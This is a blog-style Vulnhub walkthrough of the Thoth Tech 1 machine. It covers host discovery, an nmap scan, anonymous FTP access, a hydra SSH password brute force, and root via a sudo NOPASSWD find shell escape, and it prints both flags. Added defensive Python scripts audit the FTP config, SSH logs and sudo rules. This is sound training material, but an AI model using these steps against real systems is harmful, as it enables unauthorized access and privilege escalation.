
Vulnhub: Detailed Test Walkthrough of the Thoth Machine

Published: 2022-12-10 16:59:17
Tags: pwnlab, kali, Thoth, 192.168, Vulnhub, 56.127, target machine, txt, root

Thoth

Author: Jason_huawen

Basic information about the target machine

Name: Thoth Tech: 1

Address:

https://www.vulnhub.com/entry/thoth-tech-1,734/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:6f:27:91      1      60  PCS Systemtechnik GmbH
 192.168.56.127  08:00:27:2b:0f:8b      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.127.

NMAP scan

Run a full port scan of the target host with NMAP:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.127 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 03:10 EST
Nmap scan report for bogon (192.168.56.127)
Host is up (0.000085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             110 Jul 02  2021 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f:ab:7b (RSA)
|   256 78:ca:86:73:b6:87:06:08:eb:7a:9c:ab:cf:9d:89:16 (ECDSA)
|_  256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2B:0F:8B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

The NMAP results show that the target host has three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Getting a shell

Based on the NMAP results, start by gathering information from the FTP service:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ftp 192.168.56.127                    
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60624|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             110 Jul 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||30557|)
150 Opening BINARY mode data connection for note.txt (110 bytes).
100% |*********************************************************************************|   110       65.30 KiB/s    00:00 ETA
226 Transfer complete.
110 bytes received in 00:00 (54.91 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ cat note.txt 
Dear pwnlab,

My name is jake. Your password is very weak and easily crackable, I think change your password.

The target host allows anonymous FTP access. The note.txt file downloaded from it gives the following information:

  1. The username pwnlab, whose password is very weak, though it is not clear whether this is the FTP password, the SSH password, or that of some other service.

  2. The username jake, possibly an administrator role.
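As an added example that is not from the original post, this Python script audits a vsftpd.conf for the anonymous-access and plaintext settings behind the note.txt download above and emits a hardened copy; the sample configuration is constructed, not the box's actual file.

```python
# Added example, not part of the original post: audit a vsftpd.conf for the
# anonymous-access settings behind the note.txt download above, and emit a
# hardened copy. The config below is constructed, not the box's real file.
WEAK_CONF = """\
# vsftpd.conf (constructed sample)
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
chroot_local_user=YES
ssl_enable=NO
"""

# key -> (safe value, reason); values are compared case-insensitively
HARDENED = {
    "anonymous_enable": ("NO", "anonymous logins exposed note.txt to anyone on the network"),
    "anon_upload_enable": ("NO", "anonymous users must not be able to write files"),
    "anon_mkdir_write_enable": ("NO", "anonymous users must not create directories"),
    "ssl_enable": ("YES", "nmap reported control and data connections in plain text"),
}

def parse_vsftpd_conf(text):
    """Return {key: value} from key=value lines, ignoring comments and blanks."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf

def audit_vsftpd(text):
    """Return [(key, current, recommended, reason)] for every non-compliant key.
    An absent key is reported with current=None: the compiled-in default then applies."""
    conf = parse_vsftpd_conf(text)
    findings = []
    for key, (safe, reason) in HARDENED.items():
        current = conf.get(key)
        if current is None or current.upper() != safe:
            findings.append((key, current, safe, reason))
    return findings

def harden_vsftpd(text):
    """Return the config with each audited key set to its safe value (appended if missing)."""
    lines, seen = [], set()
    for raw in text.splitlines():
        key = raw.split("=", 1)[0].strip()
        if key in HARDENED and not raw.lstrip().startswith("#"):
            lines.append(f"{key}={HARDENED[key][0]}")
            seen.add(key)
        else:
            lines.append(raw)
    lines += [f"{k}={v[0]}" for k, v in HARDENED.items() if k not in seen]
    return "\n".join(lines) + "\n"
```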

Since the password is weak and the author's hint is clear, crack it with hydra:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.127 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-10 03:18:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.127:22/
[STATUS] 124.00 tries/min, 124 tries in 00:01h, 14344279 to do in 1927:60h, 12 active
[22][ssh] host: 192.168.56.127   login: pwnlab   password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-10 03:21:02

hydra cracked pwnlab's password in a fairly short time; up to that point I was still guessing whether it might be the FTP password or even that of some other service.
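As an added defender's-side example (not from the original post), the following Python script detects a guessing burst like this hydra run from OpenSSH auth.log lines; the log lines, hostname, source addresses and threshold values are constructed for illustration.

```python
# Added example, not part of the original post: flag an SSH password-guessing
# burst (like the hydra run above) from OpenSSH auth.log lines, by counting
# "Failed password" events per source IP in a sliding time window.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the syslog format Ubuntu 20.04 sshd writes to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Dec 10 03:18:27 thothtech sshd[1201]: Failed password for pwnlab from 192.168.56.206 port 40210 ssh2
Dec 10 03:18:27 thothtech sshd[1202]: Failed password for pwnlab from 192.168.56.206 port 40212 ssh2
Dec 10 03:18:28 thothtech sshd[1203]: Failed password for pwnlab from 192.168.56.206 port 40214 ssh2
Dec 10 03:18:28 thothtech sshd[1204]: Failed password for pwnlab from 192.168.56.206 port 40216 ssh2
Dec 10 03:18:29 thothtech sshd[1205]: Failed password for pwnlab from 192.168.56.206 port 40218 ssh2
Dec 10 03:18:30 thothtech sshd[1207]: Accepted password for pwnlab from 192.168.56.206 port 40222 ssh2
Dec 10 03:25:01 thothtech sshd[1300]: Failed password for invalid user jake from 192.168.56.1 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_ssh_log(text, year=2022):
    """Yield (timestamp, result, user, ip) for each recognised sshd line; syslog omits the year."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # other sshd/PAM noise is skipped
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return {ip: {"failures": n, "success_after": bool}} for each source IP whose
    failures reach `threshold` within any `window_seconds` window. A later
    "Accepted password" from the same IP marks the guessing as successful."""
    failures, alerts = defaultdict(list), {}
    for ts, result, user, ip in sorted(parse_ssh_log(text)):
        if result == "Failed":
            recent = failures[ip]
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_seconds:
                recent.pop(0)  # expire failures that fell outside the window
            if len(recent) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "success_after": False})
                entry["failures"] = max(entry["failures"], len(recent))
        elif ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts
```

On a real host, pair this with the nmap and sshd warnings above: hydra itself recommended `-t 4` because sshd rate-limits parallel sessions (MaxStartups), and that limit plus a lockout policy is what turns a 3-minute crack into an infeasible one.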

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ssh pwnlab@192.168.56.127
The authenticity of host '192.168.56.127 (192.168.56.127)' can't be established.
ED25519 key fingerprint is SHA256:92r1ZGJ7wYMcpzTK4CtNCLO1ib7UJVa+pSM1K3y/guc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.127' (ED25519) to the list of known hosts.
pwnlab@192.168.56.127's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 10 Dec 2022 08:22:21 AM UTC

  System load:  0.0                Processes:               118
  Usage of /:   24.3% of 19.56GB   Users logged in:         0
  Memory usage: 18%                IPv4 address for enp0s3: 192.168.56.127
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jul  2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$ id
uid=1001(pwnlab) gid=1001(pwnlab) groups=1001(pwnlab)
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
pwnlab@thothtech:~$ 

That gave the user flag with very little effort.

Privilege escalation

Without further ado, since pwnlab's password is already known, check whether the account has sudo privileges:

pwnlab@thothtech:~$ cat .bash_history 
cd root/
sudo nano /etc/vsftpd.conf
sudo su
su thoth_tech
ls
id
sudo -l
sudo find . -exec /bin/sh \; -quit
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find

Ha, this is easy: privileges can be escalated through the find command. The exact method can be looked up on the GTFOBins site:

pwnlab@thothtech:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# cd /root
# ls -alh
total 40K
drwx------  5 root root 4.0K Jul  2  2021 .
drwxr-xr-x 20 root root 4.0K Jun 28  2021 ..
-rw-------  1 root root   14 Jul  2  2021 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Jun 28  2021 .local
-rw-------  1 root root  146 Jun 28  2021 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   57 Jul  2  2021 root.txt
drwxr-xr-x  3 root root 4.0K Jun 28  2021 snap
drwx------  2 root root 4.0K Jun 28  2021 .ssh
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6

good job :)
# 

At this point the root shell is in hand, and port 80 was never even examined.
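An added example, not part of the original walkthrough: a Python audit of sudo -l output that flags NOPASSWD rules on shell-capable binaries such as find. The sample output is constructed around the rule shown above, and the SHELL_CAPABLE list is an assumed subset of the GTFOBins sudo entries.

```python
# Added example, not part of the original post: audit "sudo -l" style output
# for NOPASSWD rules on binaries that GTFOBins documents as able to spawn a
# shell, which is exactly how find was abused above.
import re

# Assumed, small subset of GTFOBins "sudo" entries; extend from the site as needed.
SHELL_CAPABLE = {"find", "vim", "vi", "nano", "less", "more", "awk", "perl",
                 "python", "python3", "bash", "sh", "env", "tar", "zip", "man"}

# Constructed sample, shaped like the sudo -l output shown above plus two extra rules.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart vsftpd
    (ALL : ALL) ALL
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_rules(text):
    """Return [(runas, nopasswd, [commands])] from the 'may run' section of sudo -l."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_RE.match(line) if in_commands else None
        if m:
            nopasswd = "NOPASSWD" in m["tags"].upper()
            cmds = [c.strip() for c in m["cmds"].split(",")]
            rules.append((m["runas"].strip(), nopasswd, cmds))
    return rules

def risky_rules(text):
    """Findings: rules granting root on ALL, or without a password on a shell-capable binary."""
    findings = []
    for runas, nopasswd, cmds in parse_sudo_rules(text):
        if not runas.upper().startswith(("ROOT", "ALL")):
            continue
        for cmd in cmds:
            binary = (cmd.split() or [""])[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((cmd, "unrestricted root" + (", no password" if nopasswd else "")))
            elif nopasswd and binary in SHELL_CAPABLE:
                findings.append((cmd, f"{binary} can spawn a shell (see GTFOBins) without a password"))
    return findings
```

The same check can be run against /etc/sudoers and /etc/sudoers.d/* on the host, where the `(root) NOPASSWD: /usr/bin/find` rule was authored; a fix restricts the rule to a wrapper script with fixed arguments or removes it.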

From: https://www.cnblogs.com/jason-huawen/p/16971843.html
